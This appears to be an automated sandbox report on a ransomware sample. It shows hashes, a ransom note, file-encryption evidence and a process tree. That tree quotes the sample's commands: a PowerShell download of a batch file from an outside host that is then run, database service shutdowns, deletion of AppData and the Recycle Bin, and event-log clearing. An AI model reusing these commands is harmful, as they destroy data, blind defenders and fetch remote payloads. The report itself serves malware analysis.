Analysis
-
max time kernel
142s -
max time network
22s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-05-2021 04:04
Static task
static1
Behavioral task
behavioral1
Sample
63110161_by_Libranalysis.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
63110161_by_Libranalysis.exe
Resource
win10v20210410
General
-
Target
63110161_by_Libranalysis.exe
-
Size
2.7MB
-
MD5
631101614bb5dac04fed6a14470b045e
-
SHA1
8a5b126a8d49865551a993166c070aed739bcddb
-
SHA256
39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6
-
SHA512
e60c799a16b27425ef038723d81fb03c0bd39dc8b5b217201a26ccf9bc1e8d9cd1f7e232c5a29bd7808e5eacf67b07e0c873b2af9ef8e41e3b04d5875aca81ee
Malware Config
Extracted
https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt
Extracted
C:\Decrypt_files.txt
https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view
https://t.me/Decrypt8070
https://crypto.com
https://www.binance.com
Extracted
C:\Users\Admin\Desktop\Decrypt_files.txt
https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view
https://t.me/Decrypt8070
https://crypto.com
https://www.binance.com
Signatures
-
Clears Windows event logs 1 TTPs
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 792 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGM.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299171.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205466.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14578_.GIF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePage.html.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Windows Mail\MSOERES.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL105.XML.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BORDERBB.POC.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jre7\lib\zi\America\Paramaribo.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jre7\bin\javaws.exe.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\REVERSE.DLL.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Mozilla Firefox\mozavutil.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00466_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_transcode_plugin.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\main.js.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Flow.thmx.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNOteFilter.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0281904.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00668_.WMF.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_mms_plugin.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libmmdevice_plugin.dll.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\EXPTOOWS.XLA.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BRCH98SP.POC.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\DVD Maker\audiodepthconverter.ax.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\QRYINT32.DLL.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\Rome.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LTHD11.POC.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.Email=[[email protected]]ID=[IDMCBQMVLYSLFOAM].Encrypt 63110161_by_Libranalysis.exe -
Kills process with taskkill 4 IoCs
pid Process 1960 taskkill.exe 924 taskkill.exe 576 taskkill.exe 1148 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,134" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt\DefaultIcon reg.exe -
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 792 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 792 powershell.exe 792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1960 taskkill.exe Token: SeDebugPrivilege 924 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeSecurityPrivilege 1580 wevtutil.exe Token: SeBackupPrivilege 1580 wevtutil.exe Token: SeSecurityPrivilege 876 wevtutil.exe Token: SeBackupPrivilege 876 wevtutil.exe Token: SeSecurityPrivilege 1924 wevtutil.exe Token: SeBackupPrivilege 1924 wevtutil.exe Token: SeSecurityPrivilege 1972 wevtutil.exe Token: SeBackupPrivilege 1972 wevtutil.exe Token: SeSecurityPrivilege 788 wevtutil.exe Token: SeBackupPrivilege 788 wevtutil.exe Token: SeSecurityPrivilege 396 wevtutil.exe Token: SeBackupPrivilege 396 wevtutil.exe Token: SeSecurityPrivilege 644 wevtutil.exe Token: SeBackupPrivilege 644 wevtutil.exe Token: SeSecurityPrivilege 2008 wevtutil.exe Token: SeBackupPrivilege 2008 wevtutil.exe Token: SeSecurityPrivilege 2040 wevtutil.exe Token: SeBackupPrivilege 2040 wevtutil.exe Token: SeSecurityPrivilege 1312 wevtutil.exe Token: SeBackupPrivilege 1312 wevtutil.exe Token: SeSecurityPrivilege 336 wevtutil.exe Token: SeBackupPrivilege 336 wevtutil.exe Token: SeSecurityPrivilege 1932 wevtutil.exe Token: SeBackupPrivilege 1932 wevtutil.exe Token: SeSecurityPrivilege 1396 wevtutil.exe Token: SeBackupPrivilege 1396 wevtutil.exe Token: SeSecurityPrivilege 1744 wevtutil.exe Token: SeBackupPrivilege 1744 wevtutil.exe Token: SeSecurityPrivilege 632 wevtutil.exe Token: SeBackupPrivilege 632 wevtutil.exe Token: SeSecurityPrivilege 1052 wevtutil.exe Token: SeBackupPrivilege 1052 wevtutil.exe Token: SeSecurityPrivilege 1040 wevtutil.exe Token: SeBackupPrivilege 1040 wevtutil.exe Token: SeSecurityPrivilege 1056 wevtutil.exe Token: SeBackupPrivilege 1056 wevtutil.exe Token: SeSecurityPrivilege 316 wevtutil.exe Token: SeBackupPrivilege 316 wevtutil.exe Token: SeSecurityPrivilege 1600 wevtutil.exe Token: SeBackupPrivilege 1600 wevtutil.exe Token: SeSecurityPrivilege 1928 wevtutil.exe Token: SeBackupPrivilege 1928 wevtutil.exe Token: SeSecurityPrivilege 1604 wevtutil.exe Token: SeBackupPrivilege 1604 wevtutil.exe Token: SeSecurityPrivilege 1116 wevtutil.exe Token: SeBackupPrivilege 1116 wevtutil.exe Token: SeSecurityPrivilege 1968 wevtutil.exe Token: SeBackupPrivilege 1968 wevtutil.exe Token: SeSecurityPrivilege 748 wevtutil.exe Token: SeBackupPrivilege 748 wevtutil.exe Token: SeSecurityPrivilege 1372 wevtutil.exe Token: SeBackupPrivilege 1372 wevtutil.exe Token: SeSecurityPrivilege 2020 wevtutil.exe Token: SeBackupPrivilege 2020 wevtutil.exe Token: SeSecurityPrivilege 2016 wevtutil.exe Token: SeBackupPrivilege 2016 wevtutil.exe Token: SeSecurityPrivilege 1156 wevtutil.exe Token: SeBackupPrivilege 1156 wevtutil.exe Token: SeSecurityPrivilege 1312 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1872 wrote to memory of 2044 1872 63110161_by_Libranalysis.exe 26 PID 1872 wrote to memory of 2044 1872 63110161_by_Libranalysis.exe 26 PID 1872 wrote to memory of 2044 1872 63110161_by_Libranalysis.exe 26 PID 2044 wrote to memory of 1244 2044 cmd.exe 28 PID 2044 wrote to memory of 1244 2044 cmd.exe 28 PID 2044 wrote to memory of 1244 2044 cmd.exe 28 PID 1872 wrote to memory of 1976 1872 63110161_by_Libranalysis.exe 29 PID 1872 wrote to memory of 1976 1872 63110161_by_Libranalysis.exe 29 PID 1872 wrote to memory of 1976 1872 63110161_by_Libranalysis.exe 29 PID 1976 wrote to memory of 1960 1976 cmd.exe 30 PID 1976 wrote to memory of 1960 1976 cmd.exe 30 PID 1976 wrote to memory of 1960 1976 cmd.exe 30 PID 1872 wrote to memory of 1668 1872 63110161_by_Libranalysis.exe 35 PID 1872 wrote to memory of 1668 1872 63110161_by_Libranalysis.exe 35 PID 1872 wrote to memory of 1668 1872 63110161_by_Libranalysis.exe 35 PID 1668 wrote to memory of 924 1668 cmd.exe 36 PID 1668 wrote to memory of 924 1668 cmd.exe 36 PID 1668 wrote to memory of 924 1668 cmd.exe 36 PID 1872 wrote to memory of 568 1872 63110161_by_Libranalysis.exe 37 PID 1872 wrote to memory of 568 1872 63110161_by_Libranalysis.exe 37 PID 1872 wrote to memory of 568 1872 63110161_by_Libranalysis.exe 37 PID 568 wrote to memory of 576 568 cmd.exe 38 PID 568 wrote to memory of 576 568 cmd.exe 38 PID 568 wrote to memory of 576 568 cmd.exe 38 PID 1872 wrote to memory of 684 1872 63110161_by_Libranalysis.exe 39 PID 1872 wrote to memory of 684 1872 63110161_by_Libranalysis.exe 39 PID 1872 wrote to memory of 684 1872 63110161_by_Libranalysis.exe 39 PID 684 wrote to memory of 1148 684 cmd.exe 40 PID 684 wrote to memory of 1148 684 cmd.exe 40 PID 684 wrote to memory of 1148 684 cmd.exe 40 PID 1872 wrote to memory of 616 1872 63110161_by_Libranalysis.exe 41 PID 1872 wrote to memory of 616 1872 63110161_by_Libranalysis.exe 41 PID 1872 wrote to memory of 616 1872 63110161_by_Libranalysis.exe 41 PID 1872 wrote to memory of 320 1872 63110161_by_Libranalysis.exe 42 PID 1872 wrote to memory of 320 1872 63110161_by_Libranalysis.exe 42 PID 1872 wrote to memory of 320 1872 63110161_by_Libranalysis.exe 42 PID 1872 wrote to memory of 556 1872 63110161_by_Libranalysis.exe 43 PID 1872 wrote to memory of 556 1872 63110161_by_Libranalysis.exe 43 PID 1872 wrote to memory of 556 1872 63110161_by_Libranalysis.exe 43 PID 1872 wrote to memory of 360 1872 63110161_by_Libranalysis.exe 44 PID 1872 wrote to memory of 360 1872 63110161_by_Libranalysis.exe 44 PID 1872 wrote to memory of 360 1872 63110161_by_Libranalysis.exe 44 PID 360 wrote to memory of 756 360 cmd.exe 45 PID 360 wrote to memory of 756 360 cmd.exe 45 PID 360 wrote to memory of 756 360 cmd.exe 45 PID 1872 wrote to memory of 1820 1872 63110161_by_Libranalysis.exe 46 PID 1872 wrote to memory of 1820 1872 63110161_by_Libranalysis.exe 46 PID 1872 wrote to memory of 1820 1872 63110161_by_Libranalysis.exe 46 PID 1820 wrote to memory of 1532 1820 cmd.exe 47 PID 1820 wrote to memory of 1532 1820 cmd.exe 47 PID 1820 wrote to memory of 1532 1820 cmd.exe 47 PID 1532 wrote to memory of 1740 1532 net.exe 48 PID 1532 wrote to memory of 1740 1532 net.exe 48 PID 1532 wrote to memory of 1740 1532 net.exe 48 PID 1872 wrote to memory of 1056 1872 63110161_by_Libranalysis.exe 49 PID 1872 wrote to memory of 1056 1872 63110161_by_Libranalysis.exe 49 PID 1872 wrote to memory of 1056 1872 63110161_by_Libranalysis.exe 49 PID 1056 wrote to memory of 1832 1056 cmd.exe 50 PID 1056 wrote to memory of 1832 1056 cmd.exe 50 PID 1056 wrote to memory of 1832 1056 cmd.exe 50 PID 1832 wrote to memory of 1360 1832 net.exe 51 PID 1832 wrote to memory of 1360 1832 net.exe 51 PID 1832 wrote to memory of 1360 1832 net.exe 51 PID 1872 wrote to memory of 876 1872 63110161_by_Libranalysis.exe 52 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 756 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\63110161_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\63110161_by_Libranalysis.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cmd.execmd /C "reg add HKEY_CLASSES_ROOT\.Encrypt\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,134 /f"2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\reg.exereg add HKEY_CLASSES_ROOT\.Encrypt\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,134 /f3⤵
- Modifies registry class
PID:1244
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlservr.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlservr.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlceip.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlceip.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlwriter.exe /T"2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlwriter.exe /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
-
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM Spoof.uxe.tmp /T"2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\taskkill.exetaskkill /F /IM Spoof.uxe.tmp /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Admin\AppData /s /q"2⤵PID:616
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Default\AppData /s /q"2⤵PID:320
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Public\AppData /s /q"2⤵PID:556
-
-
C:\Windows\system32\cmd.execmd /C "attrib +h +s Encrypt.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\system32\attrib.exeattrib +h +s Encrypt.exe3⤵
- Views/modifies file attributes
PID:756
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop MSSQL$SQLEXPRESS"2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\net.exenet stop MSSQL$SQLEXPRESS3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:1740
-
-
-
-
C:\Windows\system32\cmd.execmd /C "NET stop MSSQLSERVER"2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\net.exeNET stop MSSQLSERVER3⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER4⤵PID:1360
-
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop SQLSERVERAGENT"2⤵PID:876
-
C:\Windows\system32\net.exenet stop SQLSERVERAGENT3⤵PID:2044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT4⤵PID:1600
-
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop mysql"2⤵PID:1708
-
C:\Windows\system32\net.exenet stop mysql3⤵PID:1608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mysql4⤵PID:1924
-
-
-
-
C:\Windows\system32\cmd.execmd /C "net stop plesksrv"2⤵PID:1968
-
C:\Windows\system32\net.exenet stop plesksrv3⤵PID:1976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop plesksrv4⤵PID:292
-
-
-
-
C:\Windows\system32\cmd.execmd /C "rmdir C:\$Recycle.Bin /s /q"2⤵PID:904
-
-
C:\Windows\system32\cmd.execmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt', 'C:\LOG.bat')"2⤵PID:924
-
C:\windows\syswow64\windowspowershell\v1.0\powershell.exeC:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt', 'C:\LOG.bat')3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\system32\cmd.execmd /C C:\LOG.bat2⤵PID:1820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit3⤵PID:316
-
C:\Windows\system32\bcdedit.exebcdedit4⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵PID:1180
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
